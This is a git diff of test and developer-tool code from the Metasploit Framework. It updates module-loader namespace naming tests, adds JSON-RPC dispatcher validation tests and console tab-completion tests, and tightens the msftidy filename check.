@original_namespace_module = Msf::Modules::Auxiliary__Rspec__Mock module_set = double('Module Set') allow(module_set).to receive(:delete).with(module_reference_name) @@ -549,7 +549,7 @@ RSpec.describe Msf::Modules::Loader::Base do end let(:relative_name) do - 'Mod0' + 'Auxiliary__Rspec__Mock' end before(:example) do @@ -640,7 +640,7 @@ RSpec.describe Msf::Modules::Loader::Base do end let(:relative_name) do - 'Mod0' + 'Auxiliary__Rspec__Mock' end before(:example) do @@ -662,12 +662,12 @@ RSpec.describe Msf::Modules::Loader::Base do it 'should return the module if it is defined' do module Msf module Modules - module Mod0 + module Auxiliary__Rspec__Mock end end end - expect(subject.send(:current_module, module_names)).to eq Msf::Modules::Mod0 + expect(subject.send(:current_module, module_names)).to eq Msf::Modules::Auxiliary__Rspec__Mock end end @@ -735,18 +735,12 @@ RSpec.describe Msf::Modules::Loader::Base do expect(subject.send(:namespace_module_name, module_full_name)).to start_with('Msf::Modules::') end - it 'should prefix the relative name with Mod' do - namespace_module_name = subject.send(:namespace_module_name, module_full_name) - relative_name = namespace_module_name.gsub(/^.*::/, '') - - expect(relative_name).to start_with('Mod') - end - it 'should be reversible' do namespace_module_name = subject.send(:namespace_module_name, module_full_name) - unpacked_name = namespace_module_name.gsub(/^.*::Mod/, '') + relative_name = namespace_module_name.gsub(/^.*::/, '') + reversed_name = subject.send(:reverse_relative_name, relative_name) - expect([unpacked_name].pack('H*')).to eq module_full_name + expect(reversed_name).to eq module_full_name end end @@ -755,18 +749,12 @@ RSpec.describe Msf::Modules::Loader::Base do expect(subject.send(:namespace_module_names, module_full_name)).to start_with(['Msf', 'Modules']) end - it 'should prefix the relative name with Mod' do - namespace_module_names = subject.send(:namespace_module_names, module_full_name) - - expect(namespace_module_names.last).to start_with('Mod') - end - it 'should be reversible' do namespace_module_names = subject.send(:namespace_module_names, module_full_name) relative_name = namespace_module_names.last - unpacked_name = relative_name.gsub(/^Mod/, '') + reversed_name = subject.send(:reverse_relative_name, relative_name) - expect([unpacked_name].pack('H*')).to eq module_full_name + expect(reversed_name).to eq module_full_name end end @@ -774,14 +762,14 @@ RSpec.describe Msf::Modules::Loader::Base do include_context 'Metasploit::Framework::Spec::Constants cleaner' let(:relative_name) do - 'Mod617578696c696172792f72737065632f6d6f636b' + 'Auxiliary__Rspec__Mock' end context 'with pre-existing namespace module' do before(:example) do module Msf module Modules - module Mod617578696c696172792f72737065632f6d6f636b + module Auxiliary__Rspec__Mock class Metasploit end @@ -789,7 +777,7 @@ RSpec.describe Msf::Modules::Loader::Base do end end - @existent_namespace_module = Msf::Modules::Mod617578696c696172792f72737065632f6d6f636b + @existent_namespace_module = Msf::Modules::Auxiliary__Rspec__Mock end context 'with :reload => false' do @@ -1027,7 +1015,7 @@ RSpec.describe Msf::Modules::Loader::Base do end let(:relative_name) do - 'Mod0' + 'Auxiliary__Rspec__Mock' end it 'should do nothing if parent_module is nil' do @@ -1076,7 +1064,7 @@ RSpec.describe Msf::Modules::Loader::Base do before(:example) do module Msf module Modules - module Mod0 + module Auxiliary__Rspec__Mock class Metasploit end @@ -1084,7 +1072,7 @@ RSpec.describe Msf::Modules::Loader::Base do end end - @original_namespace_module = Msf::Modules::Mod0 + @original_namespace_module = Msf::Modules::Auxiliary__Rspec__Mock Msf::Modules.send(:remove_const, relative_name) end @@ -1093,7 +1081,7 @@ RSpec.describe Msf::Modules::Loader::Base do before(:example) do module Msf module Modules - module Mod0 + module Auxiliary__Rspec__Mock class Metasploit2 end @@ -1101,7 +1089,7 @@ RSpec.describe Msf::Modules::Loader::Base do end end - @current_namespace_module = Msf::Modules::Mod0 + @current_namespace_module = Msf::Modules::Auxiliary__Rspec__Mock end context 'with the current constant being the namespace_module' do diff --git a/spec/lib/msf/core/rpc/json/dispatcher_spec.rb b/spec/lib/msf/core/rpc/json/dispatcher_spec.rb new file mode 100644 index 0000000000..0bb8f88d46 --- /dev/null +++ b/spec/lib/msf/core/rpc/json/dispatcher_spec.rb @@ -0,0 +1,301 @@ +require 'spec_helper' +require 'json' + +require 'msf/core/rpc' + +RSpec.describe Msf::RPC::JSON::Dispatcher do + include_context 'Msf::Simple::Framework' + + def to_json(data) + return nil if data.nil? + + json = data.to_json + return json.to_s + end + + describe '#process' do + + before(:each) do + # prepare a dispatcher for all of the tests + @dispatcher = Msf::RPC::JSON::Dispatcher.new(framework) + end + + context 'invalid JSON-RPC request' do + + before(:each) do + # mock RpcCommand behavior as it isn't relevant for JSON-RPC validation + cmd = instance_double('RpcCommand') + allow(cmd).to receive(:execute).with(instance_of(String), instance_of(Array)).and_return({}) + allow(cmd).to receive(:execute).with(instance_of(String), instance_of(Hash)).and_return({}) + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_return({}) + @dispatcher.set_command(cmd) + end + + context 'is not valid JSON' do + it 'contains only a string' do + expected_response = { + jsonrpc: '2.0', + error: { + code: -32700, + message: 'Invalid JSON was received by the server. An error occurred on the server while parsing the JSON text.' + }, + id: nil + } + expect(@dispatcher.process("Ce n'est pas un JSON")).to eq(expected_response.to_json) + end + end + + context 'is not a valid request object' do + expected_response = { + jsonrpc: '2.0', + error: { + code: -32600, + message: 'The JSON sent is not a valid Request object.' + }, + id: nil + } + + it 'does not contain required jsonrpc member' do + request = '{ "method": "unit-test" }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'does not contain required method member' do + request = '{ "jsonrpc": "2.0" }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'does not contain valid JSON-RPC version number' do + request = '{ "jsonrpc": "1.0", "method": "unit-test" }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is an empty JSON object' do + expect(@dispatcher.process('{}')).to eq(expected_response.to_json) + end + + it 'is an array with an empty JSON object' do + expect(@dispatcher.process('[{}]')).to eq([expected_response].to_json) + end + + it 'is an array with an empty array' do + expect(@dispatcher.process('[[]]')).to eq([expected_response].to_json) + end + + it 'is an array with a string' do + expect(@dispatcher.process('["bad"]')).to eq([expected_response].to_json) + end + + it 'is an array with a number' do + expect(@dispatcher.process('[123456]')).to eq([expected_response].to_json) + end + + it 'is an array with true' do + expect(@dispatcher.process('[true]')).to eq([expected_response].to_json) + end + + it 'is an array with false' do + expect(@dispatcher.process('[false]')).to eq([expected_response].to_json) + end + + it 'is an array with null' do + expect(@dispatcher.process('[null]')).to eq([expected_response].to_json) + end + + context 'contains incorrect data type' do + context 'jsonrpc' do + it 'is a number' do + request = '{ "jsonrpc": 2.0, "method": "unit-test" }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is an empty JSON object' do + request = '{ "jsonrpc": {}, "method": "unit-test" }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is an empty array' do + request = '{ "jsonrpc": [], "method": "unit-test" }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is null' do + request = '{ "jsonrpc": null, "method": "unit-test" }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + end + + context 'method' do + it 'is a number' do + request = '{ "jsonrpc": "2.0", "method": 123456 }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is an empty JSON object' do + request = '{ "jsonrpc": "2.0", "method": {} }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is an empty array' do + request = '{ "jsonrpc": "2.0", "method": [] }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is null' do + request = '{ "jsonrpc": "2.0", "method": null }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + end + + context 'params' do + it 'is a number' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "params": 123456 }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is a string' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "params": "bad-params" }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is true' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "params": true }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is false' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "params": false }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is null' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "params": null }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + end + + context 'id' do + it 'is an empty JSON object' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "id": {} }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is an empty array' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "id": [] }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is an array that contains a number' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "id": [1] }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is a number that contain fractional parts' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "id": 3.14 }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is true' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "id": true }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'is false' do + request = '{ "jsonrpc": "2.0", "method": "unit-test", "id": false }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + end + end + end + end + + context 'errors on JSON-RPC method execute' do + it 'does not contain valid method name' do + # mock RpcCommand behavior for MethodNotFound exception + method_name = 'DNE' + cmd = instance_double('RpcCommand') + allow(cmd).to receive(:execute).with(instance_of(String), instance_of(Array)).and_raise(Msf::RPC::JSON::MethodNotFound.new(method_name)) + allow(cmd).to receive(:execute).with(instance_of(String), instance_of(Hash)).and_raise(Msf::RPC::JSON::MethodNotFound.new(method_name)) + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_raise(Msf::RPC::JSON::MethodNotFound.new(method_name)) + @dispatcher.set_command(cmd) + + expected_response = { + jsonrpc: '2.0', + error: { + code: -32601, + message: 'The method %s does not exist.' % { name: method_name } + }, + id: 1 + } + request = '{ "jsonrpc": "2.0", "method": "DNE", "params": [], "id": 1 }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'does not contain valid method params' do + # mock RpcCommand behavior for InvalidParams exception + cmd = instance_double('RpcCommand') + allow(cmd).to receive(:execute).with(instance_of(String), instance_of(Array)).and_raise(ArgumentError) + allow(cmd).to receive(:execute).with(instance_of(String), instance_of(Hash)).and_raise(ArgumentError) + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_raise(ArgumentError) + @dispatcher.set_command(cmd) + + expected_response = { + jsonrpc: '2.0', + error: { + code: -32602, + message: 'Invalid method parameter(s).' + }, + id: 1 + } + request = '{ "jsonrpc": "2.0", "method": "unit-test", "params": ["method-has-no-params"], "id": 1 }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'throws Msf::RPC::Exception' do + # mock RpcCommand behavior for Msf::RPC::Exception exception + error_code = 123 + error_msg = 'unit-test' + cmd = instance_double('RpcCommand') + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_raise(Msf::RPC::Exception.new(error_code, error_msg)) + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_raise(Msf::RPC::Exception.new(error_code, error_msg)) + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_raise(Msf::RPC::Exception.new(error_code, error_msg)) + @dispatcher.set_command(cmd) + + expected_response = { + jsonrpc: '2.0', + error: { + code: -32000, + message: 'Application server error: %s' % { msg: error_msg }, + data: { + code: error_code + } + }, + id: 1 + } + request = '{ "jsonrpc": "2.0", "method": "unit-test", "id": 1 }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + + it 'throws StandardError' do + # mock RpcCommand behavior for StandardError exception + error_msg = 'unit-test' + cmd = instance_double('RpcCommand') + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_raise(StandardError.new(error_msg)) + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_raise(StandardError.new(error_msg)) + allow(cmd).to receive(:execute).with(instance_of(String), nil).and_raise(StandardError.new(error_msg)) + @dispatcher.set_command(cmd) + + expected_response = { + jsonrpc: '2.0', + error: { + code: -32000, + message: 'Application server error: %s' % { msg: error_msg } + }, + id: 1 + } + request = '{ "jsonrpc": "2.0", "method": "unit-test", "id": 1 }' + expect(@dispatcher.process(request)).to eq(expected_response.to_json) + end + end + end +end diff --git a/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb index 6fa66bc98d..ceb43b8b8a 100644 --- a/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb +++ b/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb @@ -3,6 +3,7 @@ require 'spec_helper' require 'msf/ui' require 'msf/ui/console/module_command_dispatcher' require 'msf/ui/console/command_dispatcher/core' +require 'readline' RSpec.describe Msf::Ui::Console::CommandDispatcher::Core do include_context 'Msf::DBManager' @@ -14,6 +15,8 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Core do it { is_expected.to respond_to :cmd_get } it { is_expected.to respond_to :cmd_getg } + it { is_expected.to respond_to :cmd_set_tabs } + it { is_expected.to respond_to :cmd_setg_tabs } def set_and_test_variable(name, framework_value, module_value, framework_re, module_re) # set the current module @@ -80,4 +83,80 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Core do end end end + + + def set_tabs_test(option) + allow(core).to receive(:active_module).and_return(mod) + # always assume set variables validate (largely irrelevant because ours are random) + allow(driver).to receive(:on_variable_set).and_return(true) + + double = double('framework') + allow(double).to receive(:get).and_return(nil) + allow(double).to receive(:sessions).and_return([]) + allow_any_instance_of(Msf::Post).to receive(:framework).and_return(double) + + # Test for setting uncomplete option + output = core.cmd_set_tabs(option, ["set"]) + expect(output).to be_kind_of(Array).or eq(nil) + + # Test for setting option + output = core.cmd_set_tabs("", ["set", option]) + expect(output).to be_kind_of(Array).or eq(nil) + end + + describe "#cmd_set_tabs" do + # The options of all kinds of modules. + all_options = ::Msf::Exploit.new.datastore.keys + + ::Msf::Post.new.datastore.keys + + ::Msf::Auxiliary.new.datastore.keys + all_options.uniq! + + context "with a Exploit active module" do + let(:mod) do + mod = ::Msf::Exploit.new + mod.send(:initialize, {}) + mod + end + + all_options.each do |option| + describe "with #{option} arguments" do + it "should return array or nil" do + set_tabs_test(option) + end + end + end + end + + context "with a Post active module" do + let(:mod) do + mod = ::Msf::Post.new + mod.send(:initialize, {}) + mod + end + + all_options.each do |option| + describe "with #{option} arguments" do + it "should return array or nil" do + set_tabs_test(option) + end + end + end + end + + context "with a Auxiliary active module" do + let(:mod) do + mod = ::Msf::Auxiliary.new + mod.send(:initialize, {}) + mod + end + + all_options.each do |option| + describe "with #{option} arguments" do + it "should return array or nil" do + set_tabs_test(option) + end + end + end + end + end end diff --git a/spec/lib/msf/util/document_generator/normalizer_spec.rb b/spec/lib/msf/util/document_generator/normalizer_spec.rb index ae3e6289fc..2a46e9392d 100644 --- a/spec/lib/msf/util/document_generator/normalizer_spec.rb +++ b/spec/lib/msf/util/document_generator/normalizer_spec.rb @@ -63,6 +63,9 @@ RSpec.describe Msf::Util::DocumentGenerator::DocumentNormalizer do allow(mod).to receive(:type).and_return(mod_type) allow(mod).to receive(:shortname).and_return(mod_shortname) allow(mod).to receive(:targets).and_return(mod_targets) + allow(mod).to receive(:side_effects).and_return([]) + allow(mod).to receive(:stability).and_return([]) + allow(mod).to receive(:reliability).and_return([]) mod end @@ -84,6 +87,9 @@ RSpec.describe Msf::Util::DocumentGenerator::DocumentNormalizer do mod_rank: msf_mod.rank, mod_platforms: msf_mod.send(:module_info)['Platform'], mod_options: msf_mod.options, + mod_side_effects: msf_mod.side_effects, + mod_reliability: msf_mod.reliability, + mod_stability: msf_mod.stability, mod_demo: msf_mod } expect(subject.get_md_content(items, '')).to include('') diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb index e469d7d9ea..9a0c19abe1 100755 --- a/tools/dev/msftidy.rb +++ b/tools/dev/msftidy.rb @@ -254,11 +254,10 @@ class Msftidy line =~ /^\s*(require|load)\s+['"]#{lib}['"]/ end + # This check also enforces namespace module name reversibility def check_snake_case_filename - sep = File::SEPARATOR - good_name = Regexp.new "^[a-z0-9_#{sep}]+\.rb$" - unless @name =~ good_name - warn "Filenames should be alphanum and snake case." + if @name !~ /^[a-z0-9]+(?:_[a-z0-9]+)*\.rb$/ + warn('Filenames should be lowercase alphanumeric snake case.') end end